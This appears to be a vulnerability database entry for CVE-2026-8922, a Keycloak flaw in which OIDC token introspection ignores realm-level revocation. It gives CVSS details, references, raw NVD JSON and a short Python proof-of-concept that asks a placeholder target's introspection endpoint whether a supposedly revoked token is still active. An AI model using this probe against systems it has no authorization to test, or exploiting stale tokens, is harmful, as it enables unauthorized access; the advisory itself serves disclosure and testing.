CVE-2026-8922

Description

A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak（具体受影响版本需参考官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual PoC for CVE-2026-8922
# This script checks if a token remains active despite a realm-level revocation policy.

def check_revocation_bypass(introspect_url, client_id, client_secret, token):
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = {
        'client_id': client_id,
        'client_secret': client_secret,
        'token': token
    }
    
    response = requests.post(introspect_url, data=data, headers=headers)
    result = response.json()
    
    # If 'active' is true, the revocation policy is bypassed
    if result.get('active', False):
        print("[+] Vulnerability Detected: Token is active despite realm revocation policy.")
        return True
    else:
        print("[-] Token is correctly inactive.")
        return False

# Example usage
# check_revocation_bypass("https://target.com/realms/myrealm/protocol/openid-connect/token/introspect", "client", "secret", "old_token_string")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8922
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8922
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8922/
[4] VulDB https://vuldb.com/cve/CVE-2026-8922
[5] https://access.redhat.com/security/cve/CVE-2026-8922
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2479586

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8922", "sourceIdentifier": "[email protected]", "published": "2026-05-19T08:16:18.343", "lastModified": "2026-05-19T08:16:18.343", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-303"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-8922", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2479586", "source": "[email protected]"}]}}